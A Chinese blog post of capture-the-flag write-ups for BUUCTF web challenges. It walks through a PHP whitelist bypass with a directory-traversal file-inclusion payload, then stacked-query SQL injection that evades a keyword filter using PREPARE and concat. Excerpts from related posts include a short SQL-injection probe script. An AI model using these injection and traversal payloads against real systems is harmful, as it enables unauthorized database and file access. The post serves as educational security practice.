BUUCTF持续更新中

最新推荐文章于 2025-05-19 23:44:53 发布
最新推荐文章于 2025-05-19 23:44:53 发布
阅读量562 收藏 2
点赞数 1
CC 4.0 BY-SA版权
分类专栏: 刷题记 文章标签: 1024程序员节
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wo41ge/article/details/109162753
这篇博客主要记录了作者参加的多个CTF赛事,包括HCTF、强网杯、SUCTF等,重点讲述了遇到的各种SQL注入题目。文章详细分析了如何利用SQL注入漏洞,如通过堆叠查询、预处理语句、符号过滤绕过等方法,以及文件包含、源码泄露等其他攻击手段,展示了攻防过程和解题思路。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

目录

[HCTF 2018]WarmUp

这里补充一个知识点:phpmyadmin 4.8.1任意文件包含

环境我已经启动了
在这里插入图片描述
去访问一下

在这里插入图片描述
源码有提示 去访问一下

在这里插入图片描述然后看到了源码

 <?php
    highlight_file(__FILE__);
    class emmm
    {
        public static function checkFile(&$page)
        {
            $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
            if (! isset($page) || !is_string($page)) {
                echo "you can't see it";
                return false;
            }

            if (in_array($page, $whitelist)) {
                return true;
            }

            $_page = mb_substr(
                $page,
                0,
                mb_strpos($page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }

            $_page = urldecode($page);
            $_page = mb_substr(
                $_page,
                0,
                mb_strpos($_page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }
            echo "you can't see it";
            return false;
        }
    }

    if (! empty($_REQUEST['file'])
        && is_string($_REQUEST['file'])
        && emmm::checkFile($_REQUEST['file'])
    ) {
        include $_REQUEST['file'];
        exit;
    } else {
        echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
    }  
?>

在这里插入图片描述
这里白名单里给了一个提示

在这里插入图片描述尝试直接去访问它

在这里插入图片描述
报错了…

尝试穿越目录去访问

在这里插入图片描述依然报错了

看源码吧

 <?php
    highlight_file(__FILE__);
    class emmm
    {
        public static function checkFile(&$page)
        {
            $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
//这里是提供了两个白名单
            if (! isset($page) || !is_string($page)) {
                echo "you can't see it";
                return false;
            }

            if (in_array($page, $whitelist)) {
                return true;
            }

            $_page = mb_substr(  //返回中文字符串的一部分
                $page,
                0,
                mb_strpos($page . '?', '?')  

//我们输入flag  但其实它在你的字符串后面加了一个问号,然后返回问号的位置,就是=4

//所以想绕过这里,直接?flag,他检测到的问号就是0,然后0,0没有执行 就绕过了

            );
            if (in_array($_page, $whitelist)) {  //检测是不是在白名单
/hint.php?flag  进行绕过  进行目录穿越就可以了
                return true;
            }

            $_page = urldecode($page);
            $_page = mb_substr(
                $_page,
                0,
                mb_strpos($_page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }
            echo "you can't see it";
            return false;
        }
    }
//上面是定义了一个类

    if (! empty($_REQUEST['file'])  //如果变量不存在的话,empty()并不会产生警告。 
        && is_string($_REQUEST['file'])  //必须是字符串
        && emmm::checkFile($_REQUEST['file'])  //上面的那个类
    ) {
        include $_REQUEST['file'];  //就包含这个文件   参数也就是file
        exit;
    } else {
        echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
    }  
?>

所以 最后就是 这样

?file=hint.php?../../../../../../../../ffffllllaaaagggg

就得到了flag

在这里插入图片描述
flag{acbbba26-c81b-4603-bcb7-25f78adeab18}

[强网杯 2019]随便注

进入题目链接

在这里插入图片描述

  • 1.输入:1' 查看注入类型

在这里插入图片描述
所以他的sql语句是单引号过滤

  • 2.查看字段 (为2)

1' order by 2#

在这里插入图片描述

  • 3.显示回显

1' union select 1,2#
在这里插入图片描述相当于告诉了我们它的过滤

尝试用堆叠查询试试了

  • 4.查库

1;show database();

在这里插入图片描述

  • 5.查表

1';show tables;#

在这里插入图片描述
所以是有两个表

1919810931114514

words
  • 6.查列
1';show columns from `words`;#

在这里插入图片描述

表名words需要被 ` 这个符号包起来,这个符号是 esc下面一个的按键,这个符号在mysql里 用于 分割其他命令,表示此为(表名、字段名)

1';show columns from `1919810931114514`;#

在这里插入图片描述看到flag了!!!

那么如何查询到数据呢? select 函数被过滤了,其实mysql的函数有很多

这里通过 MYSQL的预处理语句,使用 :

concat('s','elect',' * from `1919810931114514`')

完成绕过

构造pyload:

1';PREPARE test from concat('s','elect','* from `1919810931114514`');EXECUTE test;#

在这里插入图片描述

flag{3b3d8fa2-2348-4d6b-81af-017ca90e6c81}

[SUCTF 2019]EasySQL

环境我已经启动了 进入题目链接

在这里插入图片描述

老套路 先看看源码里面有什么东西

在这里插入图片描述

不出意料的什么都没有

但是提示我们它是POST传参

这是一道SQL注入的题目

不管输入什么数字,字母 都是这的 没有回显

在这里插入图片描述
但是输入:0没有回显 不知道为啥

在这里插入图片描述
而且输入:1' 也不报错 同样是没有

最低0.47元/天 解锁文章

200万优质内容无限畅学
BUUCTF-Web题解(持续更新中)
2301_80281749的博客
11-25 2605
查询字段1’ union select 1,2,group_concat(id,username,password) from l0ve1ysq1#,就得到了flag:flag{5366f7aa-8040-44fc-bd88-bd0cfc671f3d}cat /flag进行查看flag文件,于是得到flag:flag{d81837e0-b908-4a0a-bac0-23ff569befe1}1,于是就得到了flag:flag{fac64f95-3877-4f3e-9772-47bb8585b31a}
buuctf misc-持续更新
zbbjya的博客
05-13 950
你居然赶我走 打开发现图片没什么信息 用winhex打开然后查找就好,会出flag 有n多种解决方法 将key.exe用winhex打开 看头文件名发现是data 然后后面像bse64编码 将使用base64编码转图片 KEY{dca57f966e4e4e31fd5b15417da63269} 扫描得到 但是记得把key改为flag 大白 发现图片只有一半 猜测flag在图片上 使用010将图片宽高调整以实现大白全部显现出来 将这里的01后面的00改为DF flag{He1l0_d4_ba1} 基础
BUUCTF
qq_18669681的博客
08-08 901
随便注 根据题目判断就初步判断为注入。 但还是测试 1. ‘ 报错 2.’ or ‘’=’ 回显正常 尝试进行注入时发现对注入的常用关键词都进行了过滤。 进行堆叠注入查询表名 1';show tables; 查询字段 show coloums from 查询表的内容有多种方法,我使用的是多语句执行。 1';Set @x=0x73656c65637420666c61672066726f6d20...
BUUCTF PWN刷题笔记(持续更新!!)
最新发布
wlmt666的博客
05-19 1065
64位,没有开启保护。点进去没发现明显的漏函数,考虑泄露libc基地址的rop构造。先看看有多少gadget估计也够用了。puts函数只接受一个参数,观看汇编看看用的哪个寄存器传输的参数。用的是edi。但是我们怎么找到so的版本呢,因为我们必须要知道so文件种puts函数的偏移量,才可以和泄露出puts的地址结合找到基址。可以用LibcSearch模块来搜索。libcsearch(符号,地址)新的心得:1.64位有效地址是6字节。2.libc.dump是LibcSearch的内置函数。
buuctf
weixin_57439582的博客
01-01 433
ACTF2020 新生赛Exec1
buuctf-misc writeup (持续更新)
dameow的博客
01-07 525
内存取证三项 文件下载解压,有几个提示信息。 volatility直接梭。 查看镜像信息imageinfo。此命令用于查看镜像的大概系统,便于执行对应的命令。 查看执行过的cmd命令cmdscan。 从这里可以到小黑在小白的电脑执行了nc,并传送一个zip文件。应该就是题目的机密文件。而且猜测压缩包有密码,对应题目的小白的密码。 还有一个信息就是小黑在小白的桌面写了点什么,以为在桌面会有txt文件。文件扫描filescan。 并不是,桌面啥也没有,txt也没有。没思路的时候
Buuctf
qq_52761202的博客
08-20 330
Http F12,发现Secret.php 访问 referer:https://www.Sycsecret.com User-Agent:Syclover browser 本地访问:127.0.0.1 开伪代理 Easy calc 看一下页面源码,发现了提示: calc.php?num=encodeURIComponent($("#content").val()) $("#content").val() 是什么意思: 获取id为content的HTML标签元素的值,是JQuery, $("#
BUUCTF(PWN)
fanshaoze的博客
09-27 447
查看我们main函数,发现这里只有system函数和/bin/sh,不存在栈溢出,终端直接nc就行。
buuctf(pwn)
个人笔记
04-04 3316
一日一PWN/REpwn1_sctf_2016 实践是检验真理的唯一标准。 pwn1_sctf_2016 1.找到漏的利用点往往才是困难点。(直接F5看看反汇编) 发现两个可以函数跟进去看看 2.这里对反汇编出来的Vuln理解了半天(本还想从汇编直接分析,不过进展收获不大,欢迎有兴趣的朋友一起交流),下面还是从伪代码分析。 通过这几行能看出最后A变成了B。即把YOU 换成了I。 因为上面是S的溢出点是3C,可fgets之读取了32并不会超过3C,但函数会把一个32个I换成32个YOU就达到了溢出点。 3.
BUUCTF(变异凯撒)
Bigotry77的博客
07-26 2018
小白看到题目的第一眼应该是没有思路,(我指的是纯小白) 我看到这个txt中的文本时就自动把afZ_和flag{}对上了。。。然后再看,偏移量?肯定不是,字母对不上,再看ASCII a, f, Z, _的ASCII码是 97, 102, 90, 95 而再看这里flag的ASCII码是102,108,97,103; 每个对应的都会相差5,可以自己推,不过感觉比较麻烦。。。 然后用python写个脚本:(借鉴的) def b_kaisa(str): first_step = 5 #首..
BUUCTF(刷题日记)
weixin_74022830的博客
03-23 1173
BUUCTFweb刷题记录
web buuctf [WUSTCTF2020]朴实无华
weixin_44214568的博客
04-01 523
1. 根据提示消息应该在头部 2.查看robots.txt (搜索引擎中访问网站的时候要查看的第一个文件) 访问 3.根据头部查看请求头和响应头 4.查看,打开网页里面对汉字的编译是乱码,在火狐浏览器中定制工具里有一个页面编辑的选项,对页面进行编辑,得到源码: <?php header('Content-type:text/html;charset=utf-8'); error_reporting(0); highlight_file(__file__); //...
buuctf——(ACTF)rome
yhfgs的博客
05-24 1049
1.下载得到rome.exe,丢到DIE中查壳,无壳,32位文件。 2.丢到IDA中,找到main,F5. 3.分析代码,其主要内容在两个while循环中(从定义中可知flag位16个字符)。 看第二个循环,可知是比较result和经过第一个循环得到的v1比较(就是flag经过第一个循环后变成了result(v12))并且可以从开头看出v12=Qsw3sj_lz4_Ujw@l。 再看第一个循环,发现是凯撒密码(看了老半天),大写字母平移12位,小写字母平移8位,其他字符不变。 直接上脚本(
BUUCTF(5)
遇事不决冲冲冲
02-28 3107
[CISCN 2019 初赛]Love Math 1 [De1CTF 2019]SSRF Me 1
buuctf】Basic(上)
「我唯一会的和擅长的只有网络安全,如果我不能在我最擅长的事情上取得成功,那么我根本不知道,我的人生还有什么意义。」
03-30 1039
求知若渴,虚心若愚
buuctf中Ezsqli
03-09
### BUUCTF EzSQLi 解题思路 在处理BUUCTF平台上的EzSQLi题目时,重点在于理解并利用SQL注入漏来获取数据库中的敏感信息。这类挑战通常涉及通过操纵输入参数使应用程序执行未授权的SQL查询。 对于此特定题目,攻击面可能存在于用户登录功能中。当用户名和密码作为输入被提交给服务器端验证逻辑时,如果这些输入未经充分净化就直接拼接到SQL命令字符串里,则存在潜在的安全风险[^1]。 为了成功完成该CTF挑战: - **分析源码**:尽可能找到有关目标Web应用如何构建查询语句的具体实现细节。 - **测试注入点**:尝试不同的特殊字符组合(如单引号 `'`),观察返回的结果是否有异常变化,以此判断是否存在可利用之处。 - **绕过防护机制**:某些情况下,开发者可能会采取一些简单的防御措施,比如过滤掉明显的恶意模式;此时需要思考更巧妙的方法来规避检测。 下面是一个Python脚本的例子,用于自动化探测基本类型的布尔盲注条件: ```python import requests url = 'http://example.com/login' # 替换成实际地址 payload_true = "' OR '1'='1" data = {'username': payload_true, 'password': ''} response = requests.post(url, data=data) if "Welcome" in response.text: print("[+] SQL Injection Vulnerability Found!") else: print("[-] No vulnerability detected.") ``` 上述代码片段展示了如何发送带有构造好的有效负载的数据包到指定URL,并依据响应内容推测后台是否存在安全缺陷。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值